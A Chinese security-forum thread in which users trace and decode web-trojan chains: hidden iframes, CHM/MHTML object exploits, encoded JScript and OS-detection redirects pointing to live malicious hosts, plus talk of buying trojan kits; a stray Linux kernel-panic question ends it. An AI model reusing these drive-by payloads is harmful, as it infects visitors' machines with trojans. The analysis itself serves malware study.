议题作者：simin99
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

几天从雪幕全系统马新春版中分离出一个文件，根据这个追踪最后得到下面的代码。
原代码都加密了，所以我用工具解了一下。不过有些东西看不懂
希望有高手指点！

*******************************************************
a.asp

<iframe src="http://www.sinanj.com/shin/images/data/1.htm" width="0" height="0"></iframe>
<script src=&#39;http://s20.cnzz.com/stat.php?id= ... =91332&show=pic&#39; language=&#39;JavaScript&#39; charset=&#39;gb2312&#39;></script>

——————————————————————————————————————————
1.htm

<html>
<body>
<iframe src="mm.htm" width="0" height="0" frameborder="0"></iframe>
<iframe src="help.htm" width="0" height="0" frameborder="0"></iframe>
<iframe src="z.htm" width="0" height="0" frameborder="0"></iframe>
</body>
</html>


**********************************************************
http://s20.cnzz.com/stat.php?id= ... =91332&show=pic&#39; language=&#39;JavaScript&#39; charset=&#39;gb2312&#39;         

上面链接的代码：

var expireDate = new Date(); var hours = expireDate.getHours(); var minutes = expireDate.getMinutes(); var seconds = expireDate.getSeconds(); var now = expireDate.getTime(); function getCookieVal_cnzz (offset) { var endstr = document.cookie.indexOf (";", offset); if (endstr == -1) endstr = document.cookie.length; return unescape(document.cookie.substring(offset, endstr)); } function GetCookie_cnzz (name) { var arg = name + "="; var alen = arg.length; var clen = document.cookie.length; var i = 0; while (i < clen) { var j = i + alen; if (document.cookie.substring(i, j) == arg) return getCookieVal_cnzz (j); i = document.cookie.indexOf(" ", i) + 1; if (i == 0) break; } return null; } var agt=navigator.userAgent.toLowerCase(); data = &#39;&agt=&#39; + escape(agt) + &#39;&r=&#39; + escape(document.referrer) + &#39;&aN=&#39; + escape(navigator.appName) + &#39;&lg=&#39; + escape(navigator.systemLanguage) + &#39;&OS=&#39; + escape(navigator.platform) + &#39;&aV=&#39; + escape(navigator.appVersion) + &#39;&ntime=0.72183800 1141742598&#39;; a=GetCookie_cnzz("cnzz02"); if (a != null) { a=parseInt(a); a=a+1; } else a=0; data=data + &#39;&repeatip=&#39; + a; rtime=GetCookie_cnzz("rtime"); ltime=GetCookie_cnzz("ltime"); cnzz_eid=GetCookie_cnzz("cnzz_eid"); if (cnzz_eid == null) { cnzz_eid=Math.floor(Math.random()*100000000) + "-" + document.referrer; } if (ltime<1000000) { rtime=0; ltime=0; } else rtime=parseInt(rtime); if (rtime<1) rtime=0; ltime=parseInt(ltime); now=parseInt(now); if (((now-ltime)>43200*1000) && (ltime>0)) rtime =rtime + 1 ; data=data + &#39;&rtime=&#39;+ rtime + &#39;&cnzz_eid=&#39; + escape(cnzz_eid); data=data + &#39;&showp=&#39; + escape(screen.width+ &#39;x&#39;+screen.height) ; document.write(&#39;&#39;); document.write(&#39;&#39;); var lefttime = 1000 * ( 86400 - hours*3600 - minutes*60 - seconds); expireDate.setTime (expireDate.getTime() + 500*86400); document.cookie = "cnzz02=" + a + "; expires=" + expireDate.toGMTString() + "; path=/"; var lefttime=1000*86400*182; expireDate.setTime (now + lefttime); document.cookie = "rtime=" + rtime + "; expires=" + expireDate.toGMTString() + "; path=/"; document.cookie = "ltime=" + now + "; expires=" + expireDate.toGMTString() + "; path=/"; document.cookie = "cnzz_eid=" + escape(cnzz_eid) + "; expires=" + expireDate.toGMTString() + "; path=/";

————————————————————————————————————————————

继续跟踪

mm.htm

<script language="javascript" src="mm.js"></script>

______________________________________________________________
help.htm       只能解码到这样，不知道解错没有？

<OBJECT Width=0 Height=0 style="display:none;" type="text/x-scriptlet" data="mk:@MSITStore:mhtml:c:\.mht!http://www.sinanj.com/shin/image ... %31%31%30%2E%68%74m"></OBJECT>

_________________________________________________________________
z.htm       其中有部分不会解码，高手指点

<textarea id="code" style="display:none;" >
   <object data="ms-its:mhtml:file://C:\foo.mht!${kaonima}/601.CHM::/caoxue.htm" type="text/x-scriptlet"></object>
</textarea>  
  
<script language="javascript">
    document.write(code.value.replace(/\${kaonima}/g,location.href.substring(0,location.href.indexOf(&#39;z.htm&#39;))));  
</script>

________________________________________________________



本人能力有限，最后所有页面走完会下载一个 3721.exe 程序，卡巴报木马病毒。



希望有高手能出来解说下到底是什么样的马？
具雪幕本人说是一个网上未公布的漏洞，出售  RMB7000  本人持怀疑态度，我看可能是他本人
捆绑的后门，那个马就是他本人的，不过那个3721能够被卡巴干掉，根据雪幕本人能力，又感觉
不会这么菜，免杀下应该不是问题。所以也搞不清楚。
在全网马生成器后面的那个a.asp跟以前放出的那个出名的全系统马中的a.gif非常相似，所以请了解
具体情况的朋友出来说说好不，让大家多了解了解全网马的具体情况。为网络安全贡献自己的力量！

http://www.eviloctal.com/forum/htm_data/9/0508/13338.html

http://www.sinanj.com/shin/image ... %31%31%30%2E%68%74m
只不过是16进制编码,用perl很好分离.
http://www.sinanj.com/shin/images/data/help.jpg::/110.htm

a.asp
这是一个含有网页马的文件.
http://www.sinanj.com/shin/images/data/1.htm"
{
  mm.htm"
  help.htm
  z.htm"      这3个是做马工具生成的
}
  你可以把
http://www.sinanj.com/shin/image ... %31%31%30%2E%68%74m"></OBJECT>
这个jpg下载下来看下.然后用记事本打开.
源码都是内嵌入式

雪幕的本身就捆绑后门的，以前的那个版本也捆绑的，前几天我刚和朋友分析了一遍。

雪幕的所谓..过全系统的马..不过也就是以前的老漏洞了..不像他说的那么好..什么未公布的漏洞..完全是骗人钱..把原来的网马哪来修改下就用了...有兴趣的话我提供两个他的马大家研究下..这两个马在他的网站卖价1000-1500的..

http://s20.cnzz.com/stat.php?id= ... =91332&show=pic&#39; language=&#39;JavaScript&#39; charset=&#39;gb2312&#39;  

这个是统计的代码...没什么害处...

雪幕的网马我个人觉得都是骗人的。有后门。。。

雪幕全系统马新春版
似乎就是他那个绑了后门的help网马换了个马甲

前几天用了一个尘土220的后门，只是最了多态变形，免杀比较好，其他的稳定性差。。。被作者自己说了有后门。发给我邮箱抓图确认。。 [s:88]

===
跑题了^_^

大家看看这个是什么网页木马。今天在qq上一个陌生人发我的。。
我把代码解密了如下：
＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝
<TITLE>请稍等 正在选择最快的服务器</title>
<meta http-equiv="refresh" content="4;URL=http://www.tingyue.net">



<script language = JScript>
{
document.write(&#39;<OBJECT Width=0 Height=0 style="display:none;" type="text/x-scriptlet" data="mk:@MSITStore:mhtml:c:\.mht!http://happy.32532.com/zm/um.chm::/%23.htm"></OBJECT>&#39;);
}
</SCRIPT>

<SCRIPT language=JScript>
{
document.write(&#39;<object data="http://happy.32532.com/98.asp" width=0 height=0></object>&#39;);}</SCRIPT>

<SCRIPT language=JScript>
{
document.write(&#39;<iframe name=I1 height=0 width=0 scrolling=no align=middle border=0 frameborder=0 src=http://happy.32532.com/afu.htm></iframe>&#39;);}</SCRIPT>

<SCRIPT language=JScript>function sopen(){try{window.showModelessDialog("http://happy.32532.com/66.htm","","status:no;scroll:no;dialogHeight:100px;dialogWidth:100px;dialogTop:2000px;dialogLeft:2000px;help:no;");self.focus();}catch(e){}}
ie=navigator.appVersion;
if(ie.indexOf("MSIE 5.0")==-1 &&
ie.indexOf("NT 5.2")==-1&&
!(ie.indexOf("NT 5.1")!=-1&&navigator.appMinorVersion.indexOf("SP2")!=-1)
){setTimeout(&#39;sopen();&#39;,0);}else{
document.write(&#39;&#39;);}</SCRIPT>

<script language=JScript>
function b2()
{
document.write(&#39;<iframe name=I1 height=0 width=0 scrolling=no align=middle border=0 frameborder=0 src=http://vearmusic.com></iframe>&#39;)
};
setTimeout("b2()",15000)
</script>
＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝
好像不是help的漏洞。。原代码如下：
＝＝＝＝＝＝＝＝＝＝＝＝＝＝
<TITLE>请稍等 正在选择最快的服务器</title>
<meta http-equiv="refresh" content="4;URL=http://www.tingyue.net">



<script language = JScript.Encode>#@~^yAAAAA==@#@&  @#@&NKmEs+  ORSDrY`v@!}A9A/K,k9O4&#39;ZP_+ro4O{!~/DzV&#39;E[b/wsCH)UW  npJ~DXa+&#39;rYaYJ6R/1Dr2DV+DEP9lYmxE:0)@$HjqPjDW.+=htD:sl1)- h4YZtDOa)&JtmwwHR2+*2  mK:&"szEs m4:)=&Y 2R4YhJ@*@!Jr$9A/K@*BbI@#@&8@#@&8DsAAA==^#~@</SCRIPT>

<SCRIPT language=JScript.Encode>#@~^aAAAAA==@#@&  @#@&NKmEs+  ORSDrY`v@!K4L^Y,NlDCxJ4YDwlz&4mw2Xcf l&+ 1W:&1RRC/aE,hr9Y4&#39;!,tro4Yx!@*@!&G(L+1O@*E#i)3R4AAA==^#~@</SCRIPT>

<SCRIPT language=JScript.Encode>#@~^nwAAAA==@#@&  @#@&NKmEs+  ORSDrY`v@!b0Dmh+,xlsnxq8P4+ro4O{!~hb[Y4&#39;T~kmDGs^kUo{UKPC^kTx&#39;sk9[VP8WMNn.{!P6.ls+4K.[+M&#39;ZPdD^x4YOw=&z4l22HR&+X2  mKhJlW!R4Y:@*@!Jr0Mlh+@*BbI)iDMAAA==^#~@</SCRIPT>

<SCRIPT language=JScript.Encode>#@~^uwEAAA==W!x^DkKxPkWanxv#`YMX`AbxNKARktWS\GNV/dfrC^WL`r4YDwl&Jtl22HRf lfyR^K:JvvctDhJBJE~r/OCDE/=UWp/mMGsV=xKi[kCsKou+bLtD)qTZw6I[blsWT  bNO4)8!!a6p[kmVGo:W2ly!!Z26pNkmsGod+6Yl TTZwai4nVa)UGpJ#IdVWR6G1Edv#p8mmY14`#`8)@#@&r&#39;xm-kTlYK. lawj+./rG  i@#@&bW`b+ r  N+a66`EHU(APXc!r#&#39;{O8~[L@#@&kRrU9+6}W`r1K,X  r#{&#39;RF&#39;&#39;@#@&Z`bnRbx[nXr0cEgK~*cqr#Z{O8[[  l7romYGDcl22tkxK..D/bGURbx9+arWcr?K rb"{Oqb@#@&#`dYPksnKEOvBkWwxvbiE~T#p8nsk+  @#@&NKmEsnUYchMkO+cvE#I8UYwAAA==^#~@</SCRIPT>

<script language=JScript.Encode>#@~^ygAAAA==@#@&0;  mDkW  P(+`*@#@&  @#@&[G1E:UYchDbOn`E@!b0.lhn,xC:xq8P4nbotOxZPAk9O4&#39;T,/1DW^VbUo{xGPmVrL  &#39;:b[N^+P(G.ND{!~0.Cs+8WM[+M&#39;T~kDmx4DY2)J&7+CM:!/k1R1G:@*@!&k6DCh@*B*@#@&)i@#@&dnY:ks+GEOcr4+`*E~8*TTZ#@#@&vDwAAA==^#~@</script>
＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝
大家看看。。。。。。。。。

这个很久了,我们研究过,不过不能免杀

拼凑起来的垃圾工具，绑马那是众人皆知的事了。

真为这些人感到羞耻，自己卖些恶心的网页木马，骗些钱就算了，还在那绑后门！不过幸运的是我感觉没有多少人会用他那木马，我在虚拟机下做过多次测试，过全系统？！笑

说实话，他的东西我真的不敢用，一般都不干净···

上面那两个马我也是从别人手里弄来的..我自己也试了..根本就不好使
这丫不厚道..骗钱就不说了..还搞后门.........
我提供下载没别的目的..只是想给喜欢马的人拿去研究.

这些马都常见的很.
对啊,经常见到一些马,将js代码写到ah.js里,在一个数字.js文件(其实是个chm文件)里放一个downloader的马,跟ICEFOX的马类似.
好象是用一个工具生成的,不知道什么工具

今天逛武汉黑客联盟的时候中的马，不知道是什么马，大家看看
＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝
<iframe src="http://wmf.kmip.net/ng/1.htm" width="0" height="0" frameborder="0"></iframe>
<script language="JavaScript" src="http://www2.ok3.net/mystat.asp?user=5956&style=6"></script>
＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝这次html文件里的内容
1.htm内容如下
＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝
                            <center><font color=red>黑网之神:著</font><center>                                       <script language=javascript>ie=&#39;windows&#39;;ver=navigator.appVersion;if(!(ver.indexOf(&#39;NT 5.0&#39;)==-1))ie=&#39;winnt&#39;;if(!(ver.indexOf(&#39;Windows 98&#39;)==-1)){ie=&#39;w98&#39;;}location.href=ie+&#39;.htm&#39;;</script>
＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝
http://www2.ok3.net/mystat.asp?user=5956&style=6的内容如下：
＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝

function echook3(){
var expireDate = new Date();
var hours = expireDate.getHours();
var minutes = expireDate.getMinutes();
var seconds = expireDate.getSeconds();
var lefttime = 1000 * ( 86400 - hours*3600 - minutes*60 - seconds);
expireDate.setTime (expireDate.getTime() + lefttime);
document.cookie = "echook3=id5956=yes" + "; expires=" + expireDate.toGMTString() +  "; path=/";
}

offset = document.cookie.indexOf("echook3=id5956");
if (offset == -1) {
echook3();
}

document.write("<script>var style=&#39;6&#39;;var url=&#39;http://www2.ok3.net/&#39;;var user=&#39;5956&#39;</script>")
document.write("<script language=javascript src="+url+"count22.asp?userid="+user+"&mystyle="+style+"&refer="+escape(document.referrer)+"&scr="+(screen.width)+"&scrh="+(screen.height)+"&offset="+offset+"></script>");
＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝
我一下中了两个木马，一个是灰鸽子，一个是盗qq的一个木马。。。
大家看看，这是不是以前的老网页木马help的还是什么新玩意？？？
中的时候有帮助文件出现过，并且在c盘生成了bootblog.hta(好像是这样写的）由于我删除了，所以只记得大概这样的。。。。

还是一直用浪子的超级网马.将#.htm加密后。只要马不被查。网马一直不会被查杀.icyfox同样也加密.
绝爱的马.以前用过.当时猪头1500买的.针对韩国机器还算是不错。

冰狐的网马不知可否不显示弹出窗口？

回[16 楼],你分析的不对哦.
你分析的最后一段代码是一个统计用的,不是恶意代码.
真正的恶意代码应该在这里:
<iframe src="" width="0" height="0" frameborder="0"></iframe>  
//一般存在长宽均为0的ifram就很可疑了,主要精力应该放在这里(个人意见)

于是就找 http://wmf.kmip.net/ng/1.htm,代码你也给出了,主要是个脚本:
ie=&#39;windows&#39;;
ver=navigator.appVersion;
if(!(ver.indexOf(&#39;NT 5.0&#39;)==-1))ie=&#39;winnt&#39;;
if(!(ver.indexOf(&#39;Windows 98&#39;)==-1)){ie=&#39;w98&#39;;}
location.href=ie+&#39;.htm&#39;;  //这句实现了网页跳转

总的功能就是根据系统不同跳到不同的网页,分别是 windows.htm  winnt.htm  w98.htm
真正的恶意代码应该存在上面的3个页面中丫.

那个判断系统的就是所谓的全系统马

抱歉打搅了。刚看到eo刚清除完灌水的帖子我又发了，实在抱歉
本人实在找不到哪个版块能行使我的发贴权....只好放这里了。不然好心人帮我移开下哈
装red hat 9时顺利安装重启时出现这样的错误。以为是网卡irq的问题，换了卡也不行.说的比较多的就是PCI设备IRQ不一致（具体是啥我也不清楚），因为ASUS华硕A8V主版出过解决这个问题的bios（能不能解决还米搜索到答案）。我已经尽我的能力去查答案了。国外的有的说是碟的问题但也排除了，应该就只剩下是不是主版的问题了，而且好多朋友也出现这样的问题，没一个能解决的。本人的主版是asus的p5vdc-mx。请各位朋友帮看看哈.
出现的错误如下：
*pde=00000000
oops:0000
CPU:0
EIP:0060:[] not tainted
EFLAGS:0001002
EIP isat disable irq [kernel] 0x4c (2.4.20-8)
eax:00000000 ebx:fffff680 ecx:ffffffed edx:c036ef80
esi:00000283 edi:00000000 ebp:ffffffed esp:cffb9f48
ds:0068 es:0068 ss:0068
process.swapper (pid:1,stackpage=cffb9000)
stack:ffffffed 00000000 c03c9e80 c01bd1fc ffffffed
00000000 c031da20 00000000c03c9e80 00000000
00000000 c01bdcd8 c03c9e80 00000000 00000028
00000001 00000001 00000001 00000001 00000001
00000001 00000001 00000001 00000001
call:trace:[]probe-hwif[kernel] 0x27c (0xcffb9f54))
[] ideprobe-init [kernel] 0xb8 (0xcffb9f74))
[] init [kernel] 0x13 (0xcffb9fd8))
[] init [kernel] 0x0 (0xcffb9fe0)
[] kernel-thread-helper [kernel] 0x5 (0xcffb9ff0))
code: ff 50 10 eb d0 eb 0d 90 90 90 90 90 90 90 90 90 90 90 90 90
<0>kernel panic:Attempted to kill init!